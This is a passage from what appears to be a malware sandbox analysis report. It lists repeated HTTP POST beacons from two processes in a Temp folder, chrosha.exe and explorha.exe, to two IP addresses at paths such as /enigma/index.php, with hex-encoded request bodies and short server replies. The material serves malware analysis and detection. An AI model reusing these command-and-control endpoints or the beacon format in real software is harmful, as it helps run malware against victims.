                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
493 | 192.168.2.5 | 50337 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:14.942354918 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:15.186094046 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
494 | 192.168.2.5 | 50338 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:15.222395897 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:15.465049028 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
495 | 192.168.2.5 | 50339 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:15.443209887 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:15.698558092 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
496 | 192.168.2.5 | 50340 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:15.605739117 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:15.858365059 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
497 | 192.168.2.5 | 50341 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:16.057404041 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:16.304892063 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
498 | 192.168.2.5 | 50342 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:16.211976051 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:16.459619999 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
499 | 192.168.2.5 | 50343 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:16.557760000 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:16.815040112 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
500 | 192.168.2.5 | 50344 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:16.713951111 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:16.968626976 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
501 | 192.168.2.5 | 50345 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:17.177166939 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:17.421614885 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
502 | 192.168.2.5 | 50346 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:17.322401047 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:17.571221113 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
503 | 192.168.2.5 | 50347 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:17.672910929 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:17.926021099 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
504 | 192.168.2.5 | 50348 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:17.819947958 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:18.068926096 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
505 | 192.168.2.5 | 50349 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:18.291055918 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:18.539308071 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
506 | 192.168.2.5 | 50350 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:18.432881117 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:18.682868004 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
507 | 192.168.2.5 | 50351 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:18.791254044 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:19.043031931 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
508 | 192.168.2.5 | 50352 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:18.935334921 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:19.183657885 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
509 | 192.168.2.5 | 50353 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:19.403923988 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:19.655016899 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
510 | 192.168.2.5 | 50354 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:19.542620897 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
